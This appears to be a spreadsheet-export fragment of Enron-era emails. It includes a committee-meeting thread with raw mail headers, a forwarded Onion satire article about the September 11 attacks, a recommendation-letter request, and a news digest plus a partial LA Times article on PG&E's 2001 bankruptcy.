_x000D_
_x000D_
&gt;  -----Original Message-----_x000D_
&gt; From:     SloanConsulting@aol.com@ENRON_x000D_
&gt; Sent: Tuesday, December 18, 2001 5:29 PM_x000D_
&gt; To:   vkamins@enron.com; mfkeeth@shellus.com;_x000D_
&gt; gerald.w.mcelvy@exxonmobil.com; dph@swbll.net;_x000D_
&gt; Bob.Peebler@halliburton.com; tina.sivinski@eds.com;_x000D_
&gt; bwillia6@us.ibm.com_x000D_
&gt; Cc:   pkumar@uh.edu_x000D_
&gt; Subject:  Tim Tipton input on Seminars/Forums Sub Group_x000D_
&gt;_x000D_
&gt; Forwarding to you Tim Tipton's input._x000D_
&gt;_x000D_
&gt; Return-Path: &lt;TNTipton@MarathonOil.com&gt;_x000D_
&gt; Received: from  rly-xb03.mx.aol.com (rly-xb03.mail.aol.com_x000D_
&gt; [172.20.105.104]) by air-xb05.mail.aol.com (v82.22) with ESMTP id_x000D_
&gt; MAILINXB58-1218115129; Tue, 18 Dec 2001 11:51:29 -0500_x000D_
&gt; Received: from  HOURS205.mgroupnet.com (houinet3.hou.moc.com_x000D_
&gt; [192.70.218.5]) by rly-xb03.mx.aol.com (v82.22) with ESMTP id_x000D_
&gt; MAILRELAYINXB35-1218115056; Tue, 18 Dec 2001 11:50:56 -0500_x000D_
&gt; Received: from HOUEXC202.mgroupnet.com ([89.60.4.15]) by_x000D_
&gt; HOURS205.mgroupnet.com with Microsoft SMTPSVC(5.0.2195.2966);  Tue, 18_x000D_
&gt; Dec 2001 10:29:18 -0600_x000D_
&gt; X-MimeOLE: Produced By Microsoft Exchange V6.0.4712.0_x000D_
&gt; content-class: urn:content-classes:message_x000D_
&gt; MIME-Version: 1.0_x000D_
&gt; Content-Type: multipart/mixed;_x000D_
&gt; boundary="----_=_NextPart_001_01C187E1.213803A2"_x000D_
&gt; Subject: RE: Next Energy Committee Meeting_x000D_
&gt; Date: Tue, 18 Dec 2001 10:29:13 -0600_x000D_
&gt; Message-ID:_x000D_
&gt; &lt;55AB91900AB222428BBCDD7E4733BD9195DA39@HOUEXC201.mgroupnet.com&gt;_x000D_
&gt; X-MS-Has-Attach:_x000D_
&gt; X-MS-TNEF-Correlator:_x000D_
&gt; Thread-Topic: Next Energy Committee Meeting_x000D_
&gt; Thread-Index: AcF/KWmG/7GFdenPRiyx09uP2hPE5AIstzFg_x000D_
&gt; From: "Tipton, T N (Tim) " &lt;TNTipton@MarathonOil.com&gt;_x000D_
&gt; To: &lt;SloanConsulting@aol.com&gt;_x000D_
&gt; X-OriginalArrivalTime: 18 Dec 2001 16:29:18.0216 (UTC)_x000D_
&gt; FILETIME=[23DCF880:01C187E1]_x000D_
&gt; X-Mailer: Unknown (No Version)_x000D_
&gt;_x000D_
&gt; Sub-group questions appear to represent a good cross-section of issues_x000D_
&gt; which will undoubtedly spur additional comments.  (MOC feedback to_x000D_
&gt; surveys attacehd.) See you 1/23.    Tim_x000D_
&gt;_x000D_
&gt;_x000D_
&gt;_x000D_
&gt; -----Original Message-----_x000D_
&gt; From: SloanConsulting@aol.com [mailto:SloanConsulting@aol.com]_x000D_
&gt; Sent: Friday, December 07, 2001 8:13 AM_x000D_
&gt; To: everett.s.gibbs@us.andersen.com; vkamins@enron.com;_x000D_
&gt; mfkeeth@shellus.com; gerald.w.mcelvy@exxonmobil.com; dph@swbell.net;_x000D_
&gt; donna.p.mcginnis@dynegy.com; bob.peebler@halliburton.com;_x000D_
&gt; tina.sivinski@eds.com; bruce.sukaly@cinergy.com; Tipton, T N (Tim) ;_x000D_
&gt; bawilliamson@duke-energy.com; bwillia6@us.ibm.com_x000D_
&gt; Cc: warga@uh.edu; bobcasey@uh.edu; pkumar@uh.edu; ban_bury@swbell.net_x000D_
&gt; Subject: Next Energy Committee Meeting_x000D_
&gt;_x000D_
&gt;_x000D_
&gt; Energy Committee Members_x000D_
&gt; I wanted to fix the date on your calendar for the next Energy_x000D_
&gt; Committee_x000D_
&gt; meeting.  From the feedback received, the best date turned out to be_x000D_
&gt; January_x000D_
&gt; 23, 2001 although not everyone could make that. The 5:00 to 7:00 PM_x000D_
&gt; period_x000D_
&gt; seemed to work ok last time so we would try this again on January 23,_x000D_
&gt; 2001._x000D_
&gt; Please mark your calendars accordingly.  We would hope to be getting_x000D_
&gt; your_x000D_
&gt; feedback soon on the specific questions sent out to each of the_x000D_
&gt; sub-groups._x000D_
&gt; Let us know if you have not received these attachements.  Relative to_x000D_
&gt; the_x000D_
&gt; next meeting agenda, the current thought is as follows:_x000D_
&gt;                           Education sub group discussion output_x000D_
&gt;_x000D_
&gt; 30 minutes_x000D_
&gt;                           Seminars/ Forums/etc sub group discussion_x000D_
&gt; 30_x000D_
&gt; minutes_x000D_
&gt;                           Energy Trading Center sub group discussion_x000D_
&gt; 30_x000D_
&gt; minutes_x000D_
&gt;                           Marketing GEMI_x000D_
&gt;_x000D_
&gt;          30 minutes_x000D_
&gt; Would appreciate hearing your thoughts of potential additional agenda_x000D_
&gt; items,_x000D_
&gt; and any initial thoughts you might have on marketing._x000D_
&gt; Happy Holidays,_x000D_
&gt; Lane_x000D_
&gt;  - GEMI.doc &lt;&lt;GEMI.doc&gt;&gt;_x000D_
_x000D_
_x000D_
**********************************************************************_x000D_
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_x000D_
**********************************************************************_x000D_
 - GEMI.doc </t>
  </si>
  <si>
    <t>Thu, 27 Sep 2001 23:38:29 -0700 (PDT)</t>
  </si>
  <si>
    <t>If only...</t>
  </si>
  <si>
    <t xml:space="preserve">  _x000D_
Mobile/PDA &lt;http://mobile.theonion.com/mobile_info/&gt; | Books &lt;http://books.theonion.com/&gt; | Onion Merchandise &amp; Subscriptions &lt;http://store.theonion.com/&gt; | National Distribution &lt;http://store.theonion.com/national/&gt; 	Media Kit &lt;http://mediakit.theonion.com/&gt; | Employment &lt;http://www.theonion.com/info/employment.html&gt; | Copyright &lt;http://www.theonion.com/info/masthead.html&gt; 	_x000D_
&lt;http://adbot.theonion.com/RealMedia/ads/click_cx.cgi/www.theonion.com///12054/Position1/redcross_092001/red468/63363434623530343362623431323030&gt; 	&lt;http://adbot.theonion.com/RealMedia/ads/click_cx.cgi/www.theonion.com///5593/Middle/dispatch_082001/disp234/63363434623530343362623431323030&gt; 	_x000D_
&lt;http://www.theonion.com/onion3734/index.html&gt; 	&lt;http://www.theonion.com/onion3734/index.html&gt; 	26 September 2001 	  	_x000D_
_x000D_
  _x000D_
_x000D_
_x000D_
      NEW YORK-Responding to recent events on Earth, God, the omniscient creator-deity worshipped by billions of followers of various faiths for more than 6,000 years, angrily clarified His longtime stance against humans killing each other Monday._x000D_
_x000D_
 	   	_x000D_
Above: God. 	_x000D_
_x000D_
      "Look, I don't know, maybe I haven't made myself completely clear, so for the record, here it is again," said the Lord, His divine face betraying visible emotion during a press conference near the site of the fallen Twin Towers. "Somehow, people keep coming up with the idea that I want them to kill their neighbor. Well, I don't. And to be honest, I'm really getting sick and tired of it. Get it straight. Not only do I not want anybody to kill anyone, but I specifically commanded you not to, in really simple terms that anybody ought to be able to understand."_x000D_
_x000D_
 	_x000D_
 	_x000D_
U.S. Vows To Defeat Whoever It Is We're At War With ? &lt;http://www.theonion.com/onion3734/us_vows_to_defeat_whoever.html&gt;	_x000D_
American Life Turns Into Bad Jerry Bruckheimer Movie ? &lt;http://www.theonion.com/onion3734/american_life_turns_into.html&gt;	_x000D_
Hijackers Surprised To Find Selves In Hell ? &lt;http://www.theonion.com/onion3734/hijackers_surprised.html&gt;	_x000D_
Not Knowing What Else To Do, Woman Bakes American-Flag Cake ? &lt;http://www.theonion.com/onion3734/woman_bakes_flag_cake.html&gt;	_x000D_
Point-Counterpoint: America's Response ? &lt;http://www.theonion.com/onion3734/point_americas_response.html&gt;	_x000D_
Talking To Your Child About The WTC Attack ? &lt;http://www.theonion.com/onion3734/talking_to_your_child_tips.html&gt;	_x000D_
On TV Tonight ? &lt;http://www.theonion.com/onion3734/on_tv_tonight_3734.html&gt;	_x000D_
  	_x000D_
_x000D_
      Worshipped by Christians, Jews, and Muslims alike, God said His name has been invoked countless times over the centuries as a reason to kill in what He called "an unending cycle of violence."_x000D_
_x000D_
      "I don't care how holy somebody claims to be," God said. "If a person tells you it's My will that they kill someone, they're wrong. Got it? I don't care what religion you are, or who you think your enemy is, here it is one more time: No killing, in My name or anyone else's, ever again."_x000D_
_x000D_
      The press conference came as a surprise to humankind, as God rarely intervenes in earthly affairs. As a matter of longstanding policy, He has traditionally left the task of interpreting His message and divine will to clerics, rabbis, priests, imams, and Biblical scholars. Theologians and laymen alike have been given the task of pondering His ineffable mysteries, deciding for themselves what to do as a matter of faith. His decision to manifest on the material plane was motivated by the deep sense of shock, outrage, and sorrow He felt over the Sept. 11 violence carried out in His name, and over its dire potential ramifications around the globe._x000D_
_x000D_
      "I tried to put it in the simplest possible terms for you people, so you'd get it straight, because I thought it was pretty important," said God, called Yahweh and Allah respectively in the Judaic and Muslim traditions. "I guess I figured I'd left no real room for confusion after putting it in a four-word sentence with one-syllable words, on the tablets I gave to Moses. How much more clear can I get?"_x000D_
_x000D_
      "But somehow, it all gets twisted around and, next thing you know, somebody's spouting off some nonsense about, 'God says I have to kill this guy, God wants me to kill that guy, it's God's will,'" God continued. "It's not God's will, all right? News flash: 'God's will' equals 'Don't murder people.'"_x000D_
_x000D_
      Worse yet, many of the worst violators claim that their actions are justified by passages in the Bible, Torah, and Qur'an._x000D_
_x000D_
      "To be honest, there's some contradictory stuff in there, okay?" God said. "So I can see how it could be pretty misleading. I admit it-My bad. I did My best to inspire them, but a lot of imperfect human agents have misinterpreted My message over the millennia. Frankly, much of the material that got in there is dogmatic, doctrinal bullshit. I turn My head for a second and, suddenly, all this stuff about homosexuality gets into Leviticus, and everybody thinks it's God's will to kill gays. It absolutely drives Me up the wall."_x000D_
_x000D_
      God praised the overwhelming majority of His Muslim followers as "wonderful, pious people," calling the perpetrators of the Sept. 11 attacks rare exceptions._x000D_
_x000D_
      "This whole medieval concept of the jihad, or holy war, had all but vanished from the Muslim world in, like, the 10th century, and with good reason," God said. "There's no such thing as a holy war, only unholy ones. The vast majority of Muslims in this world reject the murderous actions of these radical extremists, just like the vast majority of Christians in America are pissed off over those two bigots on The 700 Club."_x000D_
_x000D_
      Continued God, "Read the book: 'Allah is kind, Allah is beautiful, Allah is merciful.' It goes on and on that way, page after page. But, no, some assholes have to come along and revive this stupid holy-war crap just to further their own hateful agenda. So now, everybody thinks Muslims are all murderous barbarians. Thanks, Taliban: 1,000 years of pan-Islamic cultural progress down the drain."_x000D_
_x000D_
      God stressed that His remarks were not directed exclusively at Islamic extremists, but rather at anyone whose ideological zealotry overrides his or her ability to comprehend the core message of all world religions._x000D_
_x000D_
      "I don't care what faith you are, everybody's been making this same mistake since the dawn of time," God said. "The Muslims massacre the Hindus, the Hindus massacre the Muslims. The Buddhists, everybody massacres the Buddhists. The Jews, don't even get me started on the hardline, right-wing, Meir Kahane-loving Israeli nationalists, man. And the Christians? You people believe in a Messiah who says, 'Turn the other cheek,' but you've been killing everybody you can get your hands on since the Crusades."_x000D_
_x000D_
      Growing increasingly wrathful, God continued: "Can't you people see? What are you, morons? There are a ton of different religious traditions out there, and different cultures worship Me in different ways. But the basic message is always the same: Christianity, Islam, Judaism, Buddhism, Shintoism... every religious belief system under the sun, they all say you're supposed to love your neighbors, folks! It's not that hard a concept to grasp."_x000D_
_x000D_
      "Why would you think I'd want anything else? Humans don't need religion or God as an excuse to kill each other-you've been doing that without any help from Me since you were freaking apes!" God said. "The whole point of believing in God is to have a higher standard of behavior. How obvious can you get?"_x000D_
_x000D_
      "I'm talking to all of you, here!" continued God, His voice rising to a shout. "Do you hear Me? I don't want you to kill anybody. I'm against it, across the board. How many times do I have to say it? Don't kill each other anymore-ever! I'm fucking serious!"_x000D_
_x000D_
      Upon completing His outburst, God fell silent, standing quietly at the podium for several moments. Then, witnesses reported, God's shoulders began to shake, and He wept._x000D_
_x000D_
&lt;http://www.theonion.com/cgi-bin/email/emailthis.cgi&gt;   &lt;http://mojofarm.mediaplex.com/ad/ck/1321-4454-1552-3?1233688&gt; _x000D_
_x000D_
? Copyright 2001 Onion, Inc., All rights reserved. http://www.theonion.com/ _x000D_
_x000D_
 &lt;http://www.theonion.com/onion3734/index.html&gt; 	 &lt;http://www.theonion.com/onion3734/index.html&gt; 	26 September 2001 	Media Kit &lt;http://mediakit.theonion.com/&gt; | Employment &lt;http://www.theonion.com/info/employment.html&gt; | Copyright &lt;http://www.theonion.com/info/masthead.html&gt; 	_x000D_
? Copyright &lt;http://www.theonion.com/info/masthead.html&gt; 2001 Onion, Inc., All rights reserved. 	Masthead &lt;http://www.theonion.com/info/masthead.html&gt; | Contact Information &lt;http://www.theonion.com/info/contact_information.html&gt; | Privacy Policy &lt;http://www.theonion.com/info/privacy.html&gt; 	_x000D_
</t>
  </si>
  <si>
    <t>Mon, 1 Oct 2001 21:05:05 -0700 (PDT)</t>
  </si>
  <si>
    <t>RE: Carole Frank's Letter of Recommendation</t>
  </si>
  <si>
    <t xml:space="preserve">Please take a look.  Feel free to modify and send back for my review.  _x000D_
 _x000D_
Mike_x000D_
_x000D_
-----Original Message----- _x000D_
From: Frank, Carole _x000D_
Sent: Fri 9/21/2001 1:31 PM _x000D_
To: Ermis, Frank; Lagrasta, Fred; Grigsby, Mike; Giron, Darron C. _x000D_
Cc: Bike, Anne _x000D_
Subject: Carole Frank's Letter of Recommendation_x000D_
_x000D_
_x000D_
_x000D_
Thank you for agreeing to write a letter of recommending me for the Analyst Program.  I appreciate your time and opinion.  I have included a one page outline to help give you an idea of my accomplishments, job performance, and job development.  This outline is a guideline to help you.  _x000D_
_x000D_
Please let me know if you have any questions.  Thank you again. _x000D_
_x000D_
Sincerely, _x000D_
_x000D_
Carole Frank _x000D_
_x000D_
&lt;&lt;Outline for Carole.doc&gt;&gt; </t>
  </si>
  <si>
    <t>Mon, 9 Apr 2001 01:23:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>IEP news 4/9</t>
  </si>
  <si>
    <t>Today's IEP news...for more, please visit www.rtumble.com._x000D_
_x000D_
Thanks,_x000D_
Jean_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Los Angeles Times, April 9, 2001, Monday,, Home Edition, Page 3, 1081 words_x000D_
????, THE CALIFORNIA ENERGY CRISIS; ??CALIFORNIA AND THE WEST; ??GENERATORS_x000D_
????SCRAMBLED TO END PACTS WITH UTILITIES; ??ENERGY: EVEN BEFORE PG&amp;E FILED _x000D_
FOR_x000D_
????BANKRUPTCY, ALTERNATIVE PLANT OWNERS WHO HADN'T BEEN PAID IN MONTHS _x000D_
PURSUED_x000D_
????COURT ACTIONS., JULIE TAMAKI, TIMES STAFF WRITER, SACRAMENTO _x000D_
???(Quotes Smutny on behalf of IEP)_x000D_
_x000D_
_x000D_
_x000D_
The New York Times, April 7, 2001, Saturday, Late Edition - Final, Section_x000D_
????A; Page 1; Column 4; National Desk, 1174 words, California's Largest _x000D_
Utility_x000D_
????Files for Bankruptcy, By LAURA M. HOLSON, LOS ANGELES, April 6 _x000D_
???(Quotes Smutny on behalf of IEP)_x000D_
_x000D_
_x000D_
_x000D_
 _x000D_
Sacramento Bee, April 7, 2001, Saturday, Pg. A23;, 507 words, Natural gas_x000D_
????project OK'd, David Whitney Bee Washington Bureau and Carrie Peyton Bee_x000D_
????Staff Writer, WASHINGTON (Quotes Smutny on behalf of IEP)_x000D_
_x000D_
_x000D_
_x000D_
 _x000D_
San Jose Mercury News, April 7, 2001, Saturday, STATE AND REGIONAL NEWS,_x000D_
????K3364, 1209 words, Filing for Chapter 11 may help PG&amp;E's debt but it won't_x000D_
????solve power crisis, By Brandon Bailey ?(Quotes Smutny on behalf of IEP)_x000D_
_x000D_
_x000D_
_x000D_
ADVISORY/More Power to You Organizers to Conduct First Town Hall-Focus Group _x000D_
Meeting on Energy in San ??_x000D_
???Diego Business Wire 04/09/01, 11:00a (Copyright , 2001, Business Wire) New _x000D_
Watchdog Group Urges _x000D_
???Californians to Voice Concerns, Suggest Solutions to Energy Crisis_x000D_
_x000D_
PR Newswire, April 9, 2001, Monday, 9:01 AM Eastern Time, FINANCIAL NEWS,_x000D_
????1036 words, PG&amp;E Bankruptcy Will Not Affect Calpine's Commitment to_x000D_
????California Power Market, SAN JOSE, Calif., April 9_x000D_
_x000D_
AP Online, April 9, 2001; Monday, 5:13 AM, Eastern Time, Financial pages,_x000D_
????970 words, Governor Davis, Utility Toss Blame, GARY GENTILE, LOS ANGELES_x000D_
_x000D_
AP Online, April 8, 2001; Sunday, 7:17 PM, Eastern Time, Financial pages,_x000D_
????408 words, PG&amp;E Investors Worry About Nest Eggs, SAN FRANCISCO_x000D_
_x000D_
The Bulletin's Frontrunner, April 9, 2001, 1419 words, California Governor,_x000D_
????PG&amp;E Trade Shots In Wake Of Utility's Bankruptcy Filing._x000D_
_x000D_
Financial Times (London), April 9, 2001, Monday, COMPANIES &amp; FINANCE_x000D_
????INTERNATIONAL;, Pg. 28, 340 words, COMPANIES &amp; FINANCE INTERNATIONAL:_x000D_
????Southern Edison says no to filing, By PAUL ABRAHAMS, SAN FRANCISCO_x000D_
_x000D_
Financial Times (London), April 9, 2001, Monday, GLOBAL INVESTING;, Pg. 28,_x000D_
????729 words, GLOBAL INVESTING: Hard sell expected for California bonds: _x000D_
While_x000D_
????details are sketchy, the state is hoping to help solve its power troubles_x000D_
????through the Dollars 10bn-Dollars 14bn issue,_x000D_
_x000D_
Investment Dealers Digest, April 09, 2001, 868 words, Stranded Cost_x000D_
????Securitizations Take Off, But Don't Expect an Avalanche of Deals: Issuance_x000D_
????hits $6 billion as California and courts cast a shadow, Mairin Burns_x000D_
????(mairin.burns@tfn.com)_x000D_
_x000D_
Los Angeles Times, April 9, 2001, Monday,, Home Edition, Page 7, 981 words,_x000D_
????COMMENTARY; ??USE EMINENT DOMAIN AS A POWER TOOL, MICHAEL J. AGUIRRE,_x000D_
????Michael J. Aguirre has filed a private attorney general's lawsuit, against_x000D_
????the major power producers_x000D_
_x000D_
Los Angeles Times, April 9, 2001, Monday,, Home Edition, Page 6, 535 words,_x000D_
????DAVIS ON POWER CRISIS_x000D_
_x000D_
Los Angeles Times, April 9, 2001, Monday,, Home Edition, Page 6, 681 words,_x000D_
????SHOCK'S SILVER LINING_x000D_
_x000D_
Los Angeles Times, April 9, 2001, Monday,, Home Edition, Page 3, 769 words,_x000D_
????CAPITOL JOURNAL; ?CALIFORNIA AND THE WEST; ??Plenty of Failure to Go _x000D_
Around,_x000D_
????GEORGE SKELTON, SACRAMENTO_x000D_
_x000D_
Los Angeles Times, April 9, 2001, Monday,, Home Edition, Page 3, 1081 words_x000D_
????, THE CALIFORNIA ENERGY CRISIS; ??CALIFORNIA AND THE WEST; ??GENERATORS_x000D_
????SCRAMBLED TO END PACTS WITH UTILITIES; ??ENERGY: EVEN BEFORE PG&amp;E FILED _x000D_
FOR_x000D_
????BANKRUPTCY, ALTERNATIVE PLANT OWNERS WHO HADN'T BEEN PAID IN MONTHS _x000D_
PURSUED_x000D_
????COURT ACTIONS., JULIE TAMAKI, TIMES STAFF WRITER, SACRAMENTO_x000D_
_x000D_
Los Angeles Times, April 9, 2001, Monday,, Home Edition, Page 1, 1568 words_x000D_
????, WITH POWER PRICE SURGES, CALIFORNIA'S A FOLLOWER; ??ENERGY: MUCH OF THE_x000D_
????NATION IS ALREADY BEING ZAPPED BY DOUBLE-DIGIT INCREASES. SEVERAL STATES_x000D_
????HAVE HIGHER RATES. DEREGULATION, ANTI-POLLUTION LAWS AND DISTANCE FROM _x000D_
FUEL_x000D_
????SOURCES ARE TO BLAME., ERIC SLATER, TIMES STAFF WRITER, CHICAGO_x000D_
_x000D_
Los Angeles Times, April 9, 2001, Monday,, Home Edition, Page 1, 1386 words_x000D_
????, JUDGE IN PG&amp;E BANKRUPTCY CASE SEEN AS A PROBLEM SOLVER; ??COURTS: DENNIS_x000D_
????MONTALI WILL FACE UNPRECEDENTED LEGAL COMPLEXITIES., MAURA DOLAN, TIMES_x000D_
????LEGAL AFFAIRS WRITER, SAN FRANCISCO_x000D_
_x000D_
Los Angeles Times, April 9, 2001, Monday,, Valley Edition, Page 3, 671_x000D_
????words, THINK TANK HIRES EXPERTS WITH POWER TO SOLVE PROBLEMS DURING ENERGY_x000D_
????CRISIS, MARGARET TALEV, TIMES STAFF WRITER, CAMARILLO_x000D_
_x000D_
Los Angeles Times, April 9, 2001, Monday,, Home Edition, Page 1, 1242 words_x000D_
????, JAMES FLANIGAN; ?OTHERS LEARNING FROM CALIFORNIA'S ENERGY MISTAKES, _x000D_
JAMES_x000D_
????FLANIGAN_x000D_
_x000D_
The San Francisco Chronicle, APRIL 9, 2001, MONDAY,, FINAL EDITION, NEWS;,_x000D_
????Pg. A1, 1090 words, Governor, Utility In War Of Words; ???Davis furious as_x000D_
????PG&amp;E defends bankruptcy filing, David Lazarus_x000D_
_x000D_
The San Francisco Chronicle, APRIL 9, 2001, MONDAY,, FINAL EDITION, NEWS;,_x000D_
????Pg. A1, 1032 words, Power Grab -- Some Democrats Favor Seizing Plants,_x000D_
????Bernadette Tansey_x000D_
_x000D_
The San Francisco Chronicle, APRIL 9, 2001, MONDAY,, FINAL EDITION,_x000D_
????EDITORIAL;, Pg. A19;, 627 words, Lights Dim On Gray Davis, Marc Sandalow_x000D_
_x000D_
USA TODAY, April 9, 2001, Monday,, FIRST EDITION, MONEY;, Pg. 4B, 492 words_x000D_
????, Utility's bankruptcy filing adds to California's confusion, Martin_x000D_
????Kasindorf, LOS ANGELES_x000D_
_x000D_
Chicago Tribune, April 9, 2001 Monday, NORTH SPORTS FINAL EDITION, Metro;_x000D_
????Pg. 1; ZONE: N, 1139 words, SURGE IS SEEN IN GAS-FIRED POWER PLANTS, By _x000D_
Jeff_x000D_
????Long and Melita Marie Garza, Tribune staff reporters._x000D_
_x000D_
The Associated Press State &amp; Local Wire, April 9, 2001, Monday, BC cycle,_x000D_
????4:20 AM Eastern Time, Business News, 820 words, California's biggest _x000D_
utility_x000D_
????files for bankruptcy, By MICHAEL LIEDTKE, AP Business Writer, SAN _x000D_
FRANCISCO_x000D_
_x000D_
Los Angeles Times, April 8, 2001, Sunday,, Home Edition, Page 21, 594 words_x000D_
????, THE CALIFORNIA ENERGY CRISIS; ??DEMOCRATS SLAM BUSH 'INACTION' IN ENERGY_x000D_
????CRISIS; ??ADMINISTRATION OFFICIALS DISPUTE THE CHARGE AND ACCUSE _x000D_
CONGRESSMEN_x000D_
????OF EXPLOITING THE SITUATION FOR PARTISAN GAIN., ALISSA J. RUBIN, TIMES _x000D_
STAFF_x000D_
????WRITER, WASHINGTON_x000D_
_x000D_
Los Angeles Times, April 8, 2001, Sunday,, Home Edition, Page 1, 1146 words_x000D_
????, THE CALIFORNIA ENERGY CRISIS; ??PG&amp;E GAVE BONUSES PRIOR TO BANKRUPTCY;_x000D_
????POWER CRISIS: BEFORE ITS FILING, THE UTILITY ALSO HAD $2.5 BILLION ON HAND_x000D_
????AND HAD RESTARTED SERVICES SUSPENDED EARLIER BECAUSE OF SHAKY FINANCES., _x000D_
TIM_x000D_
????REITERMAN, TIMES STAFF WRITER, SAN FRANCISCO_x000D_
_x000D_
Los Angeles Times, April 8, 2001, Sunday,, Home Edition, Page 1, 1304 words_x000D_
????, JAMES FLANIGAN; ?STATE LOOKS TO PUBLIC POWER AS SOLUTION TO ENERGY _x000D_
CRISIS,_x000D_
????JAMES FLANIGAN_x000D_
_x000D_
Los Angeles Times, April 8, 2001, Sunday,, Orange County Edition, Page 11,_x000D_
????467 words, ORANGE COUNTY PERSPECTIVE; ??DAVIS HAS STATE HEADED FOR POWER_x000D_
????WIPEOUT; ???THE GOVERNOR DUCKED HIS RESPONSIBILITY TO STEER CALIFORNIA _x000D_
AWAY_x000D_
????FROM THE ELECTRICITY CRISIS, AN EX-SURFING CHAMP SAYS., JOYCE HOFFMAN, _x000D_
Joyce_x000D_
????Hoffman, a former women's world surfing champion, lives in, Laguna Beach_x000D_
_x000D_
Sacramento Bee, April 8, 2001, Sunday, Pg. A1;, 1497 words, Ratepayers lose_x000D_
????clout PG&amp;E filing cuts consumers' ability to exert pressure on a rescue_x000D_
????plan., Carrie Peyton and Stuart Leavenworth Bee Staff Writers_x000D_
_x000D_
Sacramento Bee, April 8, 2001, Sunday, Pg. A16;, 800 words, Chapter 11_x000D_
????filing just the first of many steps, Stuart Leavenworth and Carrie Peyton_x000D_
????Bee Staff Writers_x000D_
_x000D_
Sacramento Bee, April 8, 2001, Sunday, Pg. L4;, 563 words, Lessons from_x000D_
????history Electricity still needs a public role_x000D_
_x000D_
San Jose Mercury News, April 8, 2001, Sunday, DOMESTIC NEWS, K3554, 1393_x000D_
????words, In wake of PG&amp;E bankruptcy, California governor, state officials_x000D_
????scramble for solution, By Steve Johnson_x000D_
_x000D_
The San Francisco Chronicle, APRIL 8, 2001, SUNDAY,, FINAL EDITION, NEWS;,_x000D_
????Pg. A14, 683 words, Deregulation Debacle, Chuck Squatriglia_x000D_
_x000D_
The San Francisco Chronicle, APRIL 8, 2001, SUNDAY,, FINAL EDITION, NEWS;,_x000D_
????Pg. A1, 1709 words, POWER PLAY; ???PG&amp;E timed bankruptcy to blame Davis,_x000D_
????insiders say, David Lazarus_x000D_
_x000D_
The San Francisco Chronicle, APRIL 8, 2001, SUNDAY,, FINAL EDITION, NEWS;,_x000D_
????Pg. A1, 1471 words, Davis' Pledges Come Back To Haunt Him, Carla _x000D_
Marinucci,_x000D_
????Patrick Hoge_x000D_
_x000D_
The San Francisco Chronicle, APRIL 8, 2001, SUNDAY,, FINAL EDITION,_x000D_
????BUSINESS;, Pg. B7, 3592 words, Nuclear Warning; ???Watchdogs eye Duke's_x000D_
????salvage operation, Scott Winokur, Christian Berthelsen_x000D_
_x000D_
Los Angeles Times_x000D_
_x000D_
?????????????????????April 9, 2001, Monday, Home Edition_x000D_
_x000D_
SECTION: Part A; Part 1; Page 3; Metro Desk_x000D_
_x000D_
LENGTH: 1081 words_x000D_
_x000D_
HEADLINE: THE CALIFORNIA ENERGY CRISIS;_x000D_
_x000D_
CALIFORNIA AND THE WEST;_x000D_
_x000D_
GENERATORS SCRAMBLED TO END PACTS WITH UTILITIES;_x000D_
_x000D_
ENERGY: EVEN BEFORE PG&amp;E FILED FOR BANKRUPTCY, ALTERNATIVE PLANT OWNERS WHO_x000D_
HADN'T BEEN PAID IN MONTHS PURSUED COURT ACTIONS._x000D_
_x000D_
BYLINE: JULIE TAMAKI, TIMES STAFF WRITER_x000D_
_x000D_
_x000D_
_x000D_
DATELINE: SACRAMENTO_x000D_
_x000D_
BODY:_x000D_
_x000D_
_x000D_
??In filing for federal bankruptcy protection last week, Pacific Gas &amp; _x000D_
Electric_x000D_
Co. determined what other power producers had already concluded: The state had_x000D_
failed to solve their payment problems and the time had come for the courts to_x000D_
step in._x000D_
_x000D_
??In the days leading up to PG&amp;E's Bankruptcy Court petition, a growing number_x000D_
of alternative energy producers had also been filing lawsuits, seeking to be_x000D_
freed from their contracts with PG&amp;E and Southern California Edison. The_x000D_
litigation was triggered in part by a controversial new rate plan imposed last_x000D_
month by the state Public Utilities Commission in addition to millions of_x000D_
dollars of debt owed to the producers by the utilities._x000D_
_x000D_
??On Tuesday, Dynamis Inc. filed suit in Fresno, saying PG&amp;E owes it $ 3_x000D_
million._x000D_
_x000D_
??Carson-based Watson Cogeneration Co., one of the state's largest alternative_x000D_
energy producers, also had filed suit to have its contract with Edison_x000D_
suspended. So did Delta Power, which owns five small gas-fired plants in_x000D_
California. Both producers are owed tens of millions by Edison._x000D_
_x000D_
??At least a dozen such suits have been filed in civil courts, and lawyers _x000D_
warn_x000D_
that more could be on the way._x000D_
_x000D_
??"Tough solutions were not being brought to the equation, which left PG&amp;E and_x000D_
others feeling they were better off in the court system," said Jerry Bloom, an_x000D_
attorney for the California Cogeneration Council._x000D_
_x000D_
??The court actions come on the heels of an order by the PUC last month that_x000D_
Edison and PG&amp;E begin fully paying hundreds of small alternative energy_x000D_
producers. But some producers say that a new rate plan issued by the PUC would_x000D_
force them to operate at a loss and that nothing has been done to address the_x000D_
about $ 1.5 billion owed to members of the group by PG&amp;E and Edison._x000D_
_x000D_
??Lawyers say other producers have served Edison with notices that they plan _x000D_
to_x000D_
cancel their contracts._x000D_
_x000D_
??Gas-fired generators account for about two-thirds of the electricity _x000D_
produced_x000D_
by the alternative energy group._x000D_
_x000D_
??The California Independent System Operator, keeper of the state's power _x000D_
grid,_x000D_
reports that there continues to be a roughly 3,000-megawatt reduction in _x000D_
output_x000D_
from the alternative energy producers. The daily sum is enough power to _x000D_
supply 2_x000D_
million to 3 million typical homes._x000D_
_x000D_
??"It clearly shows the problem hasn't been fixed," said Jan Smutny-Jones, _x000D_
executive director of the Independent Energy Producers._x000D_
_x000D_
??California is home to nearly 700 producers of alternative and renewable_x000D_
energy, which as a group provide more than a quarter of the electricity used _x000D_
by_x000D_
consumers._x000D_
_x000D_
??Some of the producers have gone offline or reduced supplies for maintenance_x000D_
reasons, but others have cut back because they have not been paid by Edison_x000D_
since November or have received only partial payments from PG&amp;E._x000D_
_x000D_
??The drop in output has at times forced the state to purchase replacement_x000D_
supplies on the pricey spot market for electricity and contributed to rolling_x000D_
blackouts last month. The latter event prompted Gov. Gray Davis to propose a_x000D_
plan to get the generators up and running again._x000D_
_x000D_
??Consequently, the PUC established a new rate plan for the producers and_x000D_
ordered the utilities to begin fully paying them beginning this month. The_x000D_
payment goal would be accomplished in part by slashing the rates that PG&amp;E and_x000D_
Edison must pay the producers._x000D_
_x000D_
??But the PUC action appears to have compelled a growing number of gas-fired_x000D_
generators to file lawsuits in an effort to be released from their contracts_x000D_
